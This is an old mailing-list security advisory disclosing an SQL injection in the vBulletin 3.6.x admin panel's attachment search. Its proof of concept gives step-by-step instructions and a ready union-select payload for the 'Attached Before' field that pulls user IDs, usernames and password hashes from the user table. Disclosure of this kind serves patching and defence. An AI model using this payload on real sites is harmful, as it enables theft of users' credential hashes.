Date: Tue, 13 Mar 2007 12:41:59 -0500
From: disfigure <disfigure@gmail.com.>
To: [email protected], [email protected]Subject: vbulletin admincp sql injection
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-Virus-Scanned: antivirus-gw at tyumen.ru
/****************************************/
CREDIT:
discovered by meto5757 and disfigure
PRODUCT:
vBulletin
http://www.vbulletin.com/
VULNERABILITY:
SQL Injection
NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5
POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
greets: w4ck1ng.com
/****************************************/
